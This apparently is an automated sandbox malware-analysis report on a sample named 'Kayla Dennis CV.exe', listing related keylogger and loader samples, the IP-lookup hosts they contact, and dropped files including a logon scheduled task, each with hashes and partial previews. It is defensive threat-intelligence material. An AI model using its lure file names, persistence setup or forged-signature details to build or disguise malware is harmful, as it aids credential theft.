                                              • checkip.dyndns.org/
                                              Bank Swift Copy 2.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • checkip.dyndns.org/
                                              Order88983273293729387293828PDF.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                              • checkip.dyndns.org/
                                              RFQ for WIKA_pdf.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                              • checkip.dyndns.org/
                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              reallyfreegeoip.orgPROFORMA + PENDENTES.exeGet hashmaliciousSnake KeyloggerBrowse
                                              • 188.114.97.3
                                              QUOTATION_NOVQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                              • 188.114.97.3
                                              z30ProofofPaymentAttached.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 188.114.97.3
                                              New Order_20241711.exeGet hashmaliciousMassLogger RATBrowse
                                              • 188.114.96.3
                                              Fac.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                              • 104.21.67.152
                                              New Order Data sheet Page.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                              • 188.114.97.3
                                              Factura Honorarios 2024-11-17.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                              • 188.114.97.3
                                              Ref#150062.vbeGet hashmaliciousMassLogger RATBrowse
                                              • 188.114.96.3
                                              DHL Packing list.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 188.114.97.3
                                              #U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 188.114.97.3
                                              checkip.dyndns.comPROFORMA + PENDENTES.exeGet hashmaliciousSnake KeyloggerBrowse
                                              • 158.101.44.242
                                              QUOTATION_NOVQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                              • 193.122.6.168
                                              z30ProofofPaymentAttached.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 193.122.6.168
                                              New Order_20241711.exeGet hashmaliciousMassLogger RATBrowse
                                              • 132.226.247.73
                                              Fac.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                              • 193.122.6.168
                                              New Order Data sheet Page.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                              • 193.122.130.0
                                              Factura Honorarios 2024-11-17.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                              • 193.122.6.168
                                              Ref#150062.vbeGet hashmaliciousMassLogger RATBrowse
                                              • 193.122.6.168
                                              DHL Packing list.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 193.122.6.168
                                              #U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 158.101.44.242
                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              CLOUDFLARENETUSPROFORMA + PENDENTES.exeGet hashmaliciousSnake KeyloggerBrowse
                                              • 188.114.97.3
                                              QUOTATION_NOVQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                              • 188.114.96.3
                                              MG-Docu6800001.exeGet hashmaliciousGuLoaderBrowse
                                              • 172.67.208.107
                                              payload.vbsGet hashmaliciousUnknownBrowse
                                              • 172.67.165.138
                                              phish_alert_sp2_2.0.0.0.emlGet hashmaliciousUnknownBrowse
                                              • 1.1.1.1
                                              NoteID [4962398] _Secure_Document_Mrettinger-46568.docxGet hashmaliciousHTMLPhisherBrowse
                                              • 188.114.96.3
                                              DRP130636747.pdfGet hashmaliciousUnknownBrowse
                                              • 104.18.10.207
                                              gP5rh6fa0S.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                              • 104.26.12.205
                                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                              • 188.114.97.3
                                              file.exeGet hashmaliciousLummaCBrowse
                                              • 188.114.96.3
                                              UTMEMUSNew Order_20241711.exeGet hashmaliciousMassLogger RATBrowse
                                              • 132.226.247.73
                                              Pedido_335_20241112_614171.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 132.226.247.73
                                              JOSHHHHHH.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                              • 132.226.247.73
                                              QUOTATION_NOVQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                              • 132.226.247.73
                                              GD7656780000.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 132.226.8.169
                                              01831899-1 FDMS3008SDC.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 132.226.8.169
                                              Pagamento,jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 132.226.247.73
                                              PO NO170300999.exeGet hashmaliciousMassLogger RATBrowse
                                              • 132.226.8.169
                                              INQ02010391.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 132.226.8.169
                                              z25Solicituddecotizacion.exeGet hashmaliciousSnake KeyloggerBrowse
                                              • 132.226.8.169
                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              54328bd36c14bd82ddaa0c04b25ed9adPROFORMA + PENDENTES.exeGet hashmaliciousSnake KeyloggerBrowse
                                              • 188.114.96.3
                                              QUOTATION_NOVQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                              • 188.114.96.3
                                              z30ProofofPaymentAttached.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 188.114.96.3
                                              New Order_20241711.exeGet hashmaliciousMassLogger RATBrowse
                                              • 188.114.96.3
                                              Fac.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                              • 188.114.96.3
                                              New Order Data sheet Page.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                              • 188.114.96.3
                                              Factura Honorarios 2024-11-17.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                              • 188.114.96.3
                                              Ref#150062.vbeGet hashmaliciousMassLogger RATBrowse
                                              • 188.114.96.3
                                              DHL Packing list.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 188.114.96.3
                                              #U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 188.114.96.3
                                              No context
                                              Process:C:\Users\user\Desktop\Kayla Dennis CV.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):1304
                                              Entropy (8bit):5.342479910699661
                                              Encrypted:false
                                              SSDEEP:24:MLUE4K5E4KH1qE4DRE4mKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHDRHmYHKh3oPtHo6hAHKzP
                                              MD5:69F4C6D6E1A57244AD636131ED81FDCF
                                              SHA1:3BC170B8ED30C1968102F43661A91C548A593634
                                              SHA-256:243AF877C88EEE73B052788B4C8FD440B044D99FA7C9BAE286887A5D1888D6EA
                                              SHA-512:07A5D721605890AAA7D27531E6597951C74ED2EBA51DF5BFC94C66980E88663AA19D32E662D493BF2BF5062526EB895947FF2EB8F952C81D43191AE2C698A108
                                              Malicious:true
                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Speech, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e
                                              Process:C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):1304
                                              Entropy (8bit):5.342479910699661
                                              Encrypted:false
                                              SSDEEP:24:MLUE4K5E4KH1qE4DRE4mKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHDRHmYHKh3oPtHo6hAHKzP
                                              MD5:69F4C6D6E1A57244AD636131ED81FDCF
                                              SHA1:3BC170B8ED30C1968102F43661A91C548A593634
                                              SHA-256:243AF877C88EEE73B052788B4C8FD440B044D99FA7C9BAE286887A5D1888D6EA
                                              SHA-512:07A5D721605890AAA7D27531E6597951C74ED2EBA51DF5BFC94C66980E88663AA19D32E662D493BF2BF5062526EB895947FF2EB8F952C81D43191AE2C698A108
                                              Malicious:false
                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Speech, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):2232
                                              Entropy (8bit):5.379553825721504
                                              Encrypted:false
                                              SSDEEP:48:RWSU4xympjgs4RIoU99tK8NPZHUl7u1iMuge//YM0Uyus:RLHxvCsIfA2KRHmOug81s
                                              MD5:3058A289BE7C1A64C6C422AD650511DF
                                              SHA1:ED7548BBEBF1571110C6EB57DAAB07BE475D0B9F
                                              SHA-256:B10B58187EDFBC1BD6CABFF49DD739BCEE60107A5BEB1D6943E2C63BC3D460AB
                                              SHA-512:74E37153F79113C68ACC99ECC2752FB5B7B4E342CF57EF75C15083A6F17F740F41DE1129316A4C564BDFB0B86E1C93C9D9ADC6B770C6B779B8054608ADB0CB2D
                                              Malicious:false
                                              Preview:@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                              Process:C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe
                                              File Type:XML 1.0 document, ASCII text
                                              Category:dropped
                                              Size (bytes):1586
                                              Entropy (8bit):5.116125197823295
                                              Encrypted:false
                                              SSDEEP:24:2di4+S2qhlZ1Muy1my3UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtpJxvn:cgergYrFdOFzOzN33ODOiDdKrsuTVv
                                              MD5:2467950646BF078800B371EA46150D6E
                                              SHA1:DF7C2579CB72E549C70E8C10C1388A701000EBAF
                                              SHA-256:4999655A08A6D2AB675436F037A2B3254FE87F0B3A7993A350638E586105DCF3
                                              SHA-512:B1D68EF523FEF928176BB36ED0A34C84617AFE3AABC9ABA2F4E36ACA4E17C24CB73039A41167FB226CD475D128ED118B54C0EF088AC6B970F414FE0ECD56399E
                                              Malicious:false
                                              Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor
                                              Process:C:\Users\user\Desktop\Kayla Dennis CV.exe
                                              File Type:XML 1.0 document, ASCII text
                                              Category:dropped
                                              Size (bytes):1586
                                              Entropy (8bit):5.116125197823295
                                              Encrypted:false
                                              SSDEEP:24:2di4+S2qhlZ1Muy1my3UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtpJxvn:cgergYrFdOFzOzN33ODOiDdKrsuTVv
                                              MD5:2467950646BF078800B371EA46150D6E
                                              SHA1:DF7C2579CB72E549C70E8C10C1388A701000EBAF
                                              SHA-256:4999655A08A6D2AB675436F037A2B3254FE87F0B3A7993A350638E586105DCF3
                                              SHA-512:B1D68EF523FEF928176BB36ED0A34C84617AFE3AABC9ABA2F4E36ACA4E17C24CB73039A41167FB226CD475D128ED118B54C0EF088AC6B970F414FE0ECD56399E
                                              Malicious:true
                                              Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor
                                              Process:C:\Users\user\Desktop\Kayla Dennis CV.exe
                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Category:dropped
                                              Size (bytes):634888
                                              Entropy (8bit):7.8901190938192896
                                              Encrypted:false
                                              SSDEEP:12288:bMVmiWX9OeYHC89ljwRbfWwtODSyaAXd1mA1Ak6OsgSb4VqU+H4o5zBFtyakR:gTONYHFvjwRzCxXd1mvOsH6eYoLy5
                                              MD5:8F6D690E119684B1629D41F97B83FB23
                                              SHA1:46EFDB7AE7079A781723D75E390431AA4C6080E5
                                              SHA-256:C997AD9CAC5CB1CFC050A066E275AAE6A540443075B2641CA19331B3F065EE29
                                              SHA-512:AA25C86DA804170E08F3E4D5D64D7D07007BEE539B26B27BC39476DE4F99FCA8FC0D7EAA3854556D004217982AB36C83F8F15BB21CBF1FFCC382EDD911631D9C
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              • Antivirus: ReversingLabs, Detection: 30%
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....;g..............0..Z..........~y... ........@.. ....................................@.................................,y..O....................z...6........................................................... ............... ..H............text....Y... ...Z.................. ..`.rsrc................\..............@..@.reloc...............x..............@..B................`y......H..........d...........<N...*..........................................j.(............s....(....&*..0.................%.(...+.s....}...........%.(...+.%.(...+.s ...}.....s!...}.....s"...}......{....o#....{....o$....{....o%....{....o&...si...}....*.0..4.......s'.....{.....(...+.H...()...r...p(*.........(+...t^.....[...%......+(+...t^.....[...(-....%......+(+...t^.....[...(-....(-.........%...(...+o...+o0....{.....(...+.B...()...r...p(*......h...(+...t^.....[...%......+(+...t
                                              Process:C:\Users\user\Desktop\Kayla Dennis CV.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):26
                                              Entropy (8bit):3.95006375643621
                                              Encrypted:false
                                              SSDEEP:3:ggPYV:rPYV
                                              MD5:187F488E27DB4AF347237FE461A079AD
                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                              Malicious:true
                                              Preview:[ZoneTransfer]....ZoneId=0
                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Entropy (8bit):7.8901190938192896
                                              TrID:
                                              • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                              • Win32 Executable (generic) a (10002005/4) 49.97%
                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                              • DOS Executable Generic (2002/1) 0.01%
                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                              File name:Kayla Dennis CV.exe
                                              File size:634'888 bytes
                                              MD5:8f6d690e119684b1629d41f97b83fb23
                                              SHA1:46efdb7ae7079a781723d75e390431aa4c6080e5
                                              SHA256:c997ad9cac5cb1cfc050a066e275aae6a540443075b2641ca19331b3f065ee29
                                              SHA512:aa25c86da804170e08f3e4d5d64d7d07007bee539b26b27bc39476de4f99fca8fc0d7eaa3854556d004217982ab36c83f8f15bb21cbf1ffcc382edd911631d9c
                                              SSDEEP:12288:bMVmiWX9OeYHC89ljwRbfWwtODSyaAXd1mA1Ak6OsgSb4VqU+H4o5zBFtyakR:gTONYHFvjwRzCxXd1mvOsH6eYoLy5
                                              TLSH:F5D412A05B6E1222CBBF9E76B73462984771EA9B1873D34D1AD090D94B93F9120733C7
                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....;g..............0..Z..........~y... ........@.. ....................................@................................
                                              Icon Hash:0595150b64f0390f
                                              Entrypoint:0x49797e
                                              Entrypoint Section:.text
                                              Digitally signed:true
                                              Imagebase:0x400000
                                              Subsystem:windows gui
                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                              Time Stamp:0x673B1080 [Mon Nov 18 10:01:36 2024 UTC]
                                              TLS Callbacks:
                                              CLR (.Net) Version:
                                              OS Version Major:4
                                              OS Version Minor:0
                                              File Version Major:4
                                              File Version Minor:0
                                              Subsystem Version Major:4
                                              Subsystem Version Minor:0
                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                              Signature Valid:false
                                              Signature Issuer:CN=COMODO RSA Code Signing CA, O=COMODO CA Limited, L=Salford, S=Greater Manchester, C=GB
                                              Signature Validation Error:The digital signature of the object did not verify
                                              Error Number:-2146869232
                                              Not Before, Not After
                                              • 13/11/2018 01:00:00 09/11/2021 00:59:59
                                              Subject Chain
                                              • CN=Simon Tatham, O=Simon Tatham, L=Cambridge, S=Cambridgeshire, C=GB
                                              Version:3
                                              Thumbprint MD5:DABD77E44EF6B3BB91740FA46696B779
                                              Thumbprint SHA-1:5B9E273CF11941FD8C6BE3F038C4797BBE884268
                                              Thumbprint SHA-256:4CD3325617EBB63319BA6E8F2A74B0B8CCA58920B48D8026EBCA2C756630D570
                                              Serial:7C1118CBBADC95DA3752C46E47A27438
                                              Instruction
                                              jmp dword ptr [00402000h]
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
